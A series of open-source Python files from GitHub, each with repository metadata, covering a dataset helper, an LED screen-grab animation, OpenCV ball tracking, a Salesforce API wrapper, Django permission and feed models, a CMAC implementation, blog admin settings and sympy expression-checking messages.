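                     shuffle: int = 1000,
                     prefetch: int = tf.data.experimental.AUTOTUNE,
                     cache: str = '',
                     parallel: Optional[int] = None,
                     label_percent: bool = False,
                     seed: int = 1) -> tf.data.Dataset:
    ds = tf.data.Dataset.from_tensor_slices(self._x)
    if shuffle:
      ds = ds.shuffle(int(shuffle), seed=seed)
    if batch_size:
      ds = ds.batch(batch_size, drop_remainder=drop_remainder)
    return ds.prefetch(prefetch)
# With the sketch above, _ToyDataset().numpy() would return a single
# concatenated numpy array via the `numpy` helper defined earlier.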
| {
"content_hash": "1ae5e53f6c6e104427e37b3128401d7f",
"timestamp": "",
"source": "github",
"line_count": 165,
"max_line_length": 77,
"avg_line_length": 28.64848484848485,
"alnum_prop": 0.5422043579437276,
"repo_name": "imito/odin",
"id": "555ba377d55e254ed84ba90e65c4faa9cefb8a2b",
"size": "4727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "odin/fuel/dataset_base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1516670"
}
],
"symlink_target": ""
} |
from bibliopixel.animation.matrix import Matrix
from bibliopixel.util import log
import numpy as np
try:
import cv2
except ImportError:
log.error('Could not import cv2 library')
import os
grab = None
if os.name == 'nt':
try:
from desktopmagic.screengrab_win32 import getRectAsImage, getScreenAsImage
log.debug("Using desktopmagic module")
def nt_grab(bbox=None):
if bbox is None:
img = getScreenAsImage()
else:
img = getRectAsImage(bbox)
return img
grab = nt_grab
except Exception:
pass
if grab is None:
try:
from mss.linux import MSS as mss
from PIL import Image
sct = mss()
monitor = sct.monitors[0]
def mss_grab(bbox):
sct_img = sct.grab(monitor)
img = Image.frombytes('RGBA', sct_img.size, bytes(sct_img.raw), 'raw', 'BGRA').crop(bbox)
img = img.convert('RGB')
return img
grab = mss_grab
log.debug('Using mss module')
except Exception:
try:
from PIL import ImageGrab
grab = ImageGrab.grab
log.debug("Using PIL ImageGrab module")
except Exception:
try:
import pyscreenshot as ImageGrab
grab = ImageGrab.grab
log.debug("Using pyscreenshot module")
except Exception:
log.error("Unable to find any available screenshot option.")
grab = None
class ScreenGrab(Matrix):
def __init__(self, layout, bbox=(300, 300, 332, 332), mirror=False,
offset=0.0, crop=True, **kwds):
super().__init__(layout, **kwds)
if not sum(bbox):
bbox = None
self.bbox = bbox
self.crop = crop
self.mirror = mirror
self.image = frame = self._capFrame()
self._iw = frame.shape[1]
self._ih = frame.shape[0]
self.width = self.width
self.height = self.height
# self._scale = (self.height*1.0//self._ih)
self._cropY = 0
self._cropX = 0
xoffset = yoffset = offset
if xoffset > 1.0:
xoffset = 1.0
elif xoffset < -1.0:
xoffset = -1.0
if yoffset > 1.0:
yoffset = 1.0
elif yoffset < -1.0:
yoffset = -1.0
xoffset += 1.0
yoffset += 1.0
if self.height >= self.width:
self._cropX = (self._iw - int(self.width / (self.height / float(self._ih)))) // 2
if self._ih >= self._iw:
scale = (self.height * 1.0) // self._ih
else:
scale = (self.width * 1.0) // self._iw
else:
self._cropY = (self._ih - int(self.height / (self.width / float(self._iw)))) // 2
if self._ih >= self._iw:
scale = (self.width * 1.0) // self._iw
else:
scale = (self.height * 1.0) // self._ih
scaleW = int(self.width / scale)
scaleH = int(self.height / scale)
padTB = (scaleH - self._ih) // 2
padLR = (scaleW - self._iw) // 2
padYoff = int(round(padTB * yoffset)) - padTB
padXoff = int(round(padLR * xoffset)) - padLR
self._pad = (padTB + padYoff, padTB - padYoff,
padLR + padXoff, padLR - padXoff)
self.xoff = int(round(self._cropX * xoffset)) - self._cropX
self.yoff = int(round(self._cropY * yoffset)) - self._cropY
def _capFrame(self):
img = grab(self.bbox)
return np.array(img)
def step(self, amt=1):
image = self._capFrame()
if self.crop:
image = image[self._cropY + self.yoff:self._ih - self._cropY +
self.yoff, self._cropX + self.xoff:self._iw - self._cropX + self.xoff]
else:
t, b, l, r = self._pad
image = cv2.copyMakeBorder(
image, t, b, l, r, cv2.BORDER_CONSTANT, value=[0, 0, 0])
resized = cv2.resize(image, (self.width, self.height),
interpolation=cv2.INTER_LINEAR)
if self.mirror:
resized = cv2.flip(resized, 1)
for y in range(self.height):
for x in range(self.width):
self.layout.set(x, y, tuple(resized[y, x][0:3]))
| {
"content_hash": "6908d170b978131835a9f9b421b184e9",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 101,
"avg_line_length": 30,
"alnum_prop": 0.5159817351598174,
"repo_name": "rec/BiblioPixelAnimations",
"id": "084647c7d5ada8da68d593861321297f4e9280fb",
"size": "4380",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "BiblioPixelAnimations/matrix/ScreenGrab.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "176882"
}
],
"symlink_target": ""
} |
"""
Ball tracking example with OpenCV
http://www.pyimagesearch.com/2015/09/14/ball-tracking-with-opencv/
"""
import os
import cv2
from collections import deque
import numpy as np
def main():
"""Capture video and draw tracking box"""
    # define the lower and upper boundaries of the ball's color in the HSV
    # color space (found via range_detector.py), then initialize the
    # list of tracked points
buffer = 64
lowerRanges = (53, 3, 24)
upperRanges = (224, 139, 255)
pts = deque(maxlen=buffer)
cap = cv2.VideoCapture(0)
while True:
# capture video frames
ret, frame = cap.read()
# resize the frame, blur it, and convert it to the HSV
# color space
#frame = imutils.resize(frame, width=600)
frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, lowerRanges, upperRanges)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
# only proceed if at least one contour was found
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
# update the points queue
pts.appendleft(center)
# loop over the set of tracked points
for i in xrange(1, len(pts)):
# if either of the tracked points are None, ignore
# them
if pts[i - 1] is None or pts[i] is None:
continue
# otherwise, compute the thickness of the line and
# draw the connecting lines
thickness = int(np.sqrt(buffer / float(i + 1)) * 2.5)
cv2.line(frame, pts[i - 1], pts[i], (0, 0, 255), thickness)
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# release the capture
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
| {
"content_hash": "4fde9b72fcfcdfa1ea7d9f962cb34611",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 82,
"avg_line_length": 34.32222222222222,
"alnum_prop": 0.5642602784072516,
"repo_name": "jhertzog/pi",
"id": "dea3abdbe6d06e55f7a1fc477cc33864b873b85a",
"size": "3089",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "video_object_tracking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "17562"
},
{
"name": "Shell",
"bytes": "190"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListObjectTypes(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListObjectTypes Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListObjectTypes, self).__init__(temboo_session, '/Library/Salesforce/Objects/ListObjectTypes')
def new_input_set(self):
return ListObjectTypesInputSet()
def _make_result_set(self, result, path):
return ListObjectTypesResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListObjectTypesChoreographyExecution(session, exec_id, path)
class ListObjectTypesInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListObjectTypes
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
"""
super(ListObjectTypesInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Salesforce. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('ClientID', value)
def set_ClientSecret(self, value):
"""
Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Salesforce. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('ClientSecret', value)
def set_InstanceName(self, value):
"""
Set the value of the InstanceName input for this Choreo. ((required, string) The server url prefix that indicates which instance your Salesforce account is on (e.g. na1, na2, na3, etc).)
"""
super(ListObjectTypesInputSet, self)._set_input('InstanceName', value)
def set_RefreshToken(self, value):
"""
Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('RefreshToken', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: json (the default) and xml.)
"""
super(ListObjectTypesInputSet, self)._set_input('ResponseFormat', value)
class ListObjectTypesResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListObjectTypes Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Salesforce.)
"""
return self._output.get('Response', None)
def get_NewAccessToken(self):
"""
Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
"""
return self._output.get('NewAccessToken', None)
class ListObjectTypesChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListObjectTypesResultSet(response, path)
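# A minimal usage sketch, kept as a comment so importing this module has no
# side effects. It assumes a valid TembooSession named `session` and the
# standard execute_with_results() helper from the Temboo SDK; the instance
# name and token values below are placeholders:
#
#   choreo = ListObjectTypes(session)
#   inputs = choreo.new_input_set()
#   inputs.set_InstanceName("na1")
#   inputs.set_AccessToken("ACCESS_TOKEN")
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())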
| {
"content_hash": "8663e9bd2a5d0b97c74da98646b661a2",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 254,
"avg_line_length": 48.25581395348837,
"alnum_prop": 0.7057831325301205,
"repo_name": "jordanemedlock/psychtruths",
"id": "b7d0ab8bec14b492c0f998a23364b4b471fdd945",
"size": "5047",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/core/Library/Salesforce/Objects/ListObjectTypes.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import Group
from models import UserPermissionList, GroupPermissionList
class NonrelPermissionBackend(ModelBackend):
"""
Implements Django's permission system on Django-Nonrel
"""
supports_object_permissions = False
supports_anonymous_user = True
def get_group_permissions(self, user_obj, obj=None, user_perm_list=None):
"""
Returns a set of permission strings that this user has through his/her
groups.
"""
if user_obj.is_anonymous() or obj is not None:
return set()
if not hasattr(user_obj, '_group_perm_cache'):
perms = set([])
if not user_perm_list:
user_perm_list, _ = UserPermissionList.objects.get_or_create(user=user_obj)
groups = Group.objects.filter(id__in=user_perm_list.group_fk_list)
group_perm_lists = GroupPermissionList.objects.filter(group__in=list(groups))
for group_perm_list in group_perm_lists:
perms.update(group_perm_list.permission_list)
user_obj._group_perm_cache = perms
return user_obj._group_perm_cache
def get_all_permissions(self, user_obj, obj=None):
if user_obj.is_anonymous() or obj is not None:
return set()
if not hasattr(user_obj, '_perm_cache'):
try:
user_perm_list = UserPermissionList.objects.get(user=user_obj)
user_obj._perm_cache = set(user_perm_list.permission_list)
except UserPermissionList.DoesNotExist:
user_perm_list = None
user_obj._perm_cache = set()
user_obj._perm_cache.update(self.get_group_permissions(user_obj, user_perm_list=user_perm_list))
return user_obj._perm_cache
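# A sketch of how this backend is typically enabled in a project's settings
# (the dotted path follows this repository's layout; adjust it if the app is
# installed under a different name):
#
#   AUTHENTICATION_BACKENDS = (
#       'permission_backend_nonrel.backends.NonrelPermissionBackend',
#   )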
| {
"content_hash": "78c7e3bdd2ed6cf8d203341c5eeb0682",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 108,
"avg_line_length": 39.51063829787234,
"alnum_prop": 0.6322024771136241,
"repo_name": "vongochung/buiquocviet",
"id": "1cac6c5e71c6262f7cbd61ad945757903ae32fd4",
"size": "1857",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "permission_backend_nonrel/backends.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "114911"
},
{
"name": "JavaScript",
"bytes": "400340"
},
{
"name": "Python",
"bytes": "4966537"
},
{
"name": "Shell",
"bytes": "868"
}
],
"symlink_target": ""
} |
import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.template.defaultfilters import slugify
APPROVED_FEED='A'
DENIED_FEED='D'
PENDING_FEED='P'
DELETED_FEED='F'
STATUS_CHOICES = (
(PENDING_FEED, 'Pending'),
(DENIED_FEED, 'Denied'),
(APPROVED_FEED, 'Approved'),
)
class Feed(models.Model):
title = models.CharField(max_length=500)
slug = models.SlugField(max_length=500)
public_url = models.URLField(max_length=500)
feed_url = models.URLField(unique=True, max_length=500)
is_defunct = models.BooleanField(default=False)
approval_status = models.CharField(max_length=1, choices=STATUS_CHOICES, default=PENDING_FEED)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_feeds')
date_added = models.DateTimeField(verbose_name=_("When Feed was added to the site"), auto_now_add=True)
def __unicode__(self):
return self.title
def save(self, **kwargs):
if not self.id:
self.slug = slugify(self.title)
super(Feed, self).save(**kwargs)
class Meta:
ordering = ("title",)
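# A minimal usage sketch (illustrative values, not part of this module):
#
#   feed = Feed(title="Example Gaming Feed",
#               public_url="http://example.com/",
#               feed_url="http://example.com/rss")
#   feed.save()   # the slug is derived from the title on the first save
#   feed.slug     # -> "example-gaming-feed"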
| {
"content_hash": "2cf64dbc6d87bd3f725728db6ba0f602",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 104,
"avg_line_length": 29.657894736842106,
"alnum_prop": 0.7391304347826086,
"repo_name": "underlost/GamerNews",
"id": "ab9a8821fc14acd1bd4074366255f6e9e78a4ddc",
"size": "1127",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gamernews/apps/populate/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "226951"
},
{
"name": "JavaScript",
"bytes": "135586"
},
{
"name": "Python",
"bytes": "124181"
}
],
"symlink_target": ""
} |
"""CMAC (Cipher-based Message Authentication Code) algorithm
CMAC is a MAC defined in `NIST SP 800-38B`_ and in RFC4493_ (for AES only)
and constructed using a block cipher. It was originally known as `OMAC1`_.
The algorithm is sometimes named *X-CMAC* where *X* is the name
of the cipher (e.g. AES-CMAC).
This is an example showing how to *create* an AES-CMAC:
>>> from Crypto.Hash import CMAC
>>> from Crypto.Cipher import AES
>>>
>>> secret = b'Sixteen byte key'
>>> cobj = CMAC.new(secret, ciphermod=AES)
>>> cobj.update(b'Hello')
    >>> print(cobj.hexdigest())
And this is an example showing how to *check* an AES-CMAC:
>>> from Crypto.Hash import CMAC
>>> from Crypto.Cipher import AES
>>>
>>> # We have received a message 'msg' together
>>> # with its MAC 'mac'
>>>
>>> secret = b'Sixteen byte key'
>>> cobj = CMAC.new(secret, ciphermod=AES)
>>> cobj.update(msg)
>>> try:
    >>>   cobj.verify(mac)
    >>>   print("The message '%s' is authentic" % msg)
    >>> except ValueError:
    >>>   print("The message or the key is wrong")
A cipher block size of 128 bits (like for AES) guarantees that the risk
of MAC collisions remains negligible even when the same CMAC key is
used to authenticate a large amount of data (2^22 Gbytes).
This implementation also allows the use of ciphers with a 64-bit block size
(like TDES), for legacy purposes only.
However, the risk is much higher and one CMAC key should be rotated
after as little as 16 MBytes (in total) have been authenticated.
.. _`NIST SP 800-38B`: http://csrc.nist.gov/publications/nistpubs/800-38B/SP_800-38B.pdf
.. _RFC4493: http://www.ietf.org/rfc/rfc4493.txt
.. _OMAC1: http://www.nuee.nagoya-u.ac.jp/labs/tiwata/omac/omac.html
"""
from Crypto.Util.py3compat import b, bchr, bord, tobytes
from binascii import unhexlify
from Crypto.Hash import BLAKE2s
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes, bytes_to_long
from Crypto.Random import get_random_bytes
#: The size of the authentication tag produced by the MAC.
digest_size = None
def _shift_bytes(bs, xor_lsb=0):
num = (bytes_to_long(bs) << 1) ^ xor_lsb
return long_to_bytes(num, len(bs))[-len(bs):]
class CMAC(object):
"""Class that implements CMAC"""
#: The size of the authentication tag produced by the MAC.
digest_size = None
def __init__(self, key, msg=None, ciphermod=None, cipher_params=None):
"""Create a new CMAC object.
:Parameters:
key : byte string
secret key for the CMAC object.
The key must be valid for the underlying cipher algorithm.
For instance, it must be 16 bytes long for AES-128.
msg : byte string
The very first chunk of the message to authenticate.
It is equivalent to an early call to `update`. Optional.
ciphermod : module
A cipher module from `Crypto.Cipher`.
The cipher's block size has to be 128 bits.
It is recommended to use `Crypto.Cipher.AES`.
cipher_params : dictionary
Extra keywords to use when creating a new cipher.
"""
if ciphermod is None:
raise TypeError("ciphermod must be specified (try AES)")
self._key = key
self._factory = ciphermod
if cipher_params is None:
self._cipher_params = {}
else:
self._cipher_params = dict(cipher_params)
# Section 5.3 of NIST SP 800 38B and Appendix B
if ciphermod.block_size == 8:
const_Rb = 0x1B
self._max_size = 8 * (2 ** 21)
elif ciphermod.block_size == 16:
const_Rb = 0x87
self._max_size = 16 * (2 ** 48)
else:
raise TypeError("CMAC requires a cipher with a block size"
"of 8 or 16 bytes, not %d" %
(ciphermod.block_size,))
# Size of the final MAC tag, in bytes
self.digest_size = ciphermod.block_size
self._mac_tag = None
# Compute sub-keys
zero_block = bchr(0) * ciphermod.block_size
cipher = ciphermod.new(key,
ciphermod.MODE_ECB,
**self._cipher_params)
l = cipher.encrypt(zero_block)
if bord(l[0]) & 0x80:
self._k1 = _shift_bytes(l, const_Rb)
else:
self._k1 = _shift_bytes(l)
if bord(self._k1[0]) & 0x80:
self._k2 = _shift_bytes(self._k1, const_Rb)
else:
self._k2 = _shift_bytes(self._k1)
# Initialize CBC cipher with zero IV
self._cbc = ciphermod.new(key,
ciphermod.MODE_CBC,
zero_block,
**self._cipher_params)
# Cache for outstanding data to authenticate
self._cache = b("")
# Last two pieces of ciphertext produced
self._last_ct = self._last_pt = zero_block
self._before_last_ct = None
# Counter for total message size
self._data_size = 0
if msg:
self.update(msg)
def update(self, msg):
"""Continue authentication of a message by consuming
the next chunk of data.
Repeated calls are equivalent to a single call with
the concatenation of all the arguments. In other words:
>>> m.update(a); m.update(b)
is equivalent to:
>>> m.update(a+b)
:Parameters:
msg : byte string
The next chunk of the message being authenticated
"""
self._data_size += len(msg)
if len(self._cache) > 0:
filler = min(self.digest_size - len(self._cache), len(msg))
self._cache += msg[:filler]
if len(self._cache) < self.digest_size:
return self
msg = msg[filler:]
self._update(self._cache)
self._cache = b("")
update_len, remain = divmod(len(msg), self.digest_size)
update_len *= self.digest_size
if remain > 0:
self._update(msg[:update_len])
self._cache = msg[update_len:]
else:
self._update(msg)
self._cache = b("")
return self
def _update(self, data_block):
"""Update a block aligned to the block boundary"""
if len(data_block) == 0:
return
assert len(data_block) % self.digest_size == 0
ct = self._cbc.encrypt(data_block)
if len(data_block) == self.digest_size:
self._before_last_ct = self._last_ct
else:
self._before_last_ct = ct[-self.digest_size * 2:-self.digest_size]
self._last_ct = ct[-self.digest_size:]
self._last_pt = data_block[-self.digest_size:]
def copy(self):
"""Return a copy ("clone") of the MAC object.
The copy will have the same internal state as the original MAC
object.
This can be used to efficiently compute the MAC of strings that
share a common initial substring.
:Returns: A `CMAC` object
"""
obj = CMAC(self._key,
ciphermod=self._factory,
cipher_params=self._cipher_params)
obj._cbc = self._factory.new(self._key,
self._factory.MODE_CBC,
self._last_ct,
**self._cipher_params)
for m in ['_mac_tag', '_last_ct', '_before_last_ct', '_cache',
'_data_size', '_max_size']:
setattr(obj, m, getattr(self, m))
return obj
def digest(self):
"""Return the **binary** (non-printable) MAC of the message that has
been authenticated so far.
This method does not change the state of the MAC object.
You can continue updating the object after calling this function.
:Return: A byte string of `digest_size` bytes. It may contain non-ASCII
characters, including null bytes.
"""
if self._mac_tag is not None:
return self._mac_tag
if self._data_size > self._max_size:
raise ValueError("MAC is unsafe for this message")
if len(self._cache) == 0 and self._before_last_ct is not None:
## Last block was full
pt = strxor(strxor(self._before_last_ct, self._k1), self._last_pt)
else:
## Last block is partial (or message length is zero)
ext = self._cache + bchr(0x80) +\
bchr(0) * (self.digest_size - len(self._cache) - 1)
pt = strxor(strxor(self._last_ct, self._k2), ext)
cipher = self._factory.new(self._key,
self._factory.MODE_ECB,
**self._cipher_params)
self._mac_tag = cipher.encrypt(pt)
return self._mac_tag
def hexdigest(self):
"""Return the **printable** MAC of the message that has been
authenticated so far.
This method does not change the state of the MAC object.
:Return: A string of 2* `digest_size` bytes. It contains only
hexadecimal ASCII digits.
"""
return "".join(["%02x" % bord(x)
for x in tuple(self.digest())])
def verify(self, mac_tag):
"""Verify that a given **binary** MAC (computed by another party)
is valid.
:Parameters:
mac_tag : byte string
The expected MAC of the message.
:Raises ValueError:
if the MAC does not match. It means that the message
has been tampered with or that the MAC key is incorrect.
"""
secret = get_random_bytes(16)
mac1 = BLAKE2s.new(digest_bits=160, key=secret, data=mac_tag)
mac2 = BLAKE2s.new(digest_bits=160, key=secret, data=self.digest())
if mac1.digest() != mac2.digest():
raise ValueError("MAC check failed")
def hexverify(self, hex_mac_tag):
"""Verify that a given **printable** MAC (computed by another party)
is valid.
:Parameters:
hex_mac_tag : string
The expected MAC of the message, as a hexadecimal string.
:Raises ValueError:
if the MAC does not match. It means that the message
has been tampered with or that the MAC key is incorrect.
"""
self.verify(unhexlify(tobytes(hex_mac_tag)))
def new(key, msg=None, ciphermod=None, cipher_params=None):
"""Create a new CMAC object.
:Parameters:
key : byte string
secret key for the CMAC object.
The key must be valid for the underlying cipher algorithm.
For instance, it must be 16 bytes long for AES-128.
msg : byte string
The very first chunk of the message to authenticate.
It is equivalent to an early call to `CMAC.update`. Optional.
ciphermod : module
A cipher module from `Crypto.Cipher`.
The cipher's block size has to be 128 bits,
like `Crypto.Cipher.AES`, to reduce the probability of collisions.
:Returns: A `CMAC` object
"""
return CMAC(key, msg, ciphermod, cipher_params)
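# A small sketch of the prefix-sharing use of copy() documented above; it
# relies only on names defined in this module plus Crypto.Cipher.AES, and the
# key/message values are illustrative:
#
#   from Crypto.Cipher import AES
#   base = new(b'Sixteen byte key', msg=b'common prefix', ciphermod=AES)
#   mac_a = base.copy().update(b' suffix A').hexdigest()
#   mac_b = base.copy().update(b' suffix B').hexdigest()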
| {
"content_hash": "d8076f71a78f9a04dd08d6fa088254e8",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 88,
"avg_line_length": 34.47575757575758,
"alnum_prop": 0.5728223609035774,
"repo_name": "Samuel789/MediPi",
"id": "6c10390d35604d874ee9e1855aca3e554410f005",
"size": "12413",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "MedManagementWeb/env/lib/python3.5/site-packages/Crypto/Hash/CMAC.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10012"
},
{
"name": "CSS",
"bytes": "847678"
},
{
"name": "HTML",
"bytes": "4238145"
},
{
"name": "Java",
"bytes": "1942198"
},
{
"name": "JavaScript",
"bytes": "2308166"
},
{
"name": "PHP",
"bytes": "1684"
},
{
"name": "Python",
"bytes": "66091"
},
{
"name": "Ruby",
"bytes": "1183"
},
{
"name": "Shell",
"bytes": "17053"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import gettext_lazy as _
from djangocms_blog.admin import PostAdmin
from .models import CustomUser, PostExtension
@admin.register(CustomUser)
class CustomUserAdmin(UserAdmin):
model = CustomUser
fieldsets = (
(None, {"fields": ("username", "password")}),
(_("Personal info"), {"fields": ("first_name", "last_name", "email")}),
(_("Permissions"), {"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")}),
(_("Important dates"), {"fields": ("last_login", "date_joined")}),
(_("Sites"), {"fields": ("sites",)}),
)
class CustomPostAdmin(PostAdmin):
_fieldsets = [
(None, {"fields": ["title", "subtitle", "slug", "publish", "categories"]}),
(
_("Info"),
{
"fields": [
["tags"],
["date_published", "date_published_end", "date_featured"],
"app_config",
"enable_comments",
],
"classes": ("collapse",),
},
),
(
_("Images"),
{"fields": [["main_image", "main_image_thumbnail", "main_image_full"]], "classes": ("collapse",)},
),
(_("SEO"), {"fields": [["meta_description", "meta_title", "meta_keywords"]], "classes": ("collapse",)}),
]
_fieldset_extra_fields_position = {
"abstract": [0, 1],
"post_text": [0, 1],
"sites": [1, 1, 0],
"author": [1, 1],
"enable_liveblog": None,
"related": None,
}
class PostExtensionInline(admin.TabularInline):
model = PostExtension
fields = ["some_field"]
classes = ["collapse"]
extra = 1
can_delete = False
verbose_name = "PostExtension"
verbose_name_plural = "PostExtensions"
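# How these classes would typically be wired up (a sketch only; the
# registration used by the test suite happens elsewhere):
#
#   from djangocms_blog.models import Post
#   admin.site.unregister(Post)
#   admin.site.register(Post, CustomPostAdmin)
#   # PostExtensionInline would then be listed in CustomPostAdmin.inlines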
| {
"content_hash": "ce21299d08fd4267e0074cafb47ae801",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 112,
"avg_line_length": 31.59016393442623,
"alnum_prop": 0.5241307732226258,
"repo_name": "nephila/djangocms-blog",
"id": "ff284d561dcaa88520b7cef79eb46dbcc71319cb",
"size": "1927",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_utils/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "939"
},
{
"name": "HTML",
"bytes": "16041"
},
{
"name": "JavaScript",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "389126"
}
],
"symlink_target": ""
} |
from sympy import srepr
#Singleton related return values
class SingletonOutput():
messages = {
'IMPROPER_TERM': 'Improper term in singleton',
'REDUCIBLE': "Singleton can be reduced",
'INVALID_SUM': "More than one term in singleton",
'INVALID_PRODUCT': "Invalid product in singleton",
'VALID_SUM':"Expression is a valid singleton",
'VALID_PRODUCT':"Expression is a valid singleton",
'VALID': "Expression is a singleton",
'VALID_TRIG': "Expression is a trig function",
'VALID_INVTRIG': "Expression is an inverse trig function",
'INVALID': "Not a singleton",
'COMPLEX': "Expression is a complex number",
'COMPLEX_NO_REAL': "Complex number that has no real part",
'REAL': "Expression is a real singleton",
'IMAGINARY': "Expression is the imaginary unit",
'IMAGINARY_IMPROPER':"Imaginary Number to improper power",
'IMAGINARY_OK_FACTORS':"Expression has no imaginary numbers to powers"
}
@staticmethod
def strout(key):
return SingletonOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+SingletonOutput.messages.get(key, None)
class MonomialOutput():
#Monomial related return values
messages = {
'REDUCIBLE':"Monomial is reducible",
'EXPANDABLE':"One or more monomials could be expanded",
'PROPER':"Expression is a proper monomial",
'IMPROPER':"Expression is not a proper monomial",
'IS_SINGLETON':"Monomial is also a singleton",
'MULTIPLE_TERMS':"More than 1 term in monomial"
}
@staticmethod
def strout(key):
return MonomialOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+MonomialOutput.messages.get(key, None)
class PolynomialOutput():
#Polynomial related return values
messages = {
'IS_MONOMIAL':"Expression is also a monomial",
'EXPANDED':"Monomials in expression are expanded",
'FACTORED':"Expression is fully factored!",
'NOT_FACTORED':"Expression is not fully factored",
'NOT_MONOMIAL':"One or more terms is not a proper monomial",
'NOT_EXPANDED':"Expression is not fully expanded",
'SQUAREFREE':"Expression is squarefree",
'NOT_SQUAREFREE':"Expression is not squarefree",
'CONTENTFREE_MONOMIAL':"Expression is a monomial",
'CONTENTFREE':"Expression is contentfree",
'NOT_CONTENTFREE':"Expression is not contentfree",
'COMPlEX_HIGH_DEGREE':"Expression has a degree higher than 1",
'COMPLEX_FACTORED':"Expression is simplified over the complex field",
'REAL_HIGH_DEGREE':"Expression has a degree higher than 2",
'REAL_FACTORABLE_QUAD':"Quadratic can be factored further",
'REAL_FACTORED': "Expression is factored within the real numbers",
'INTEGER_REDUCIBLE':"Expression could be factored further in the integers",
'INTEGER_FACTORED':"Expression is factored within the integers",
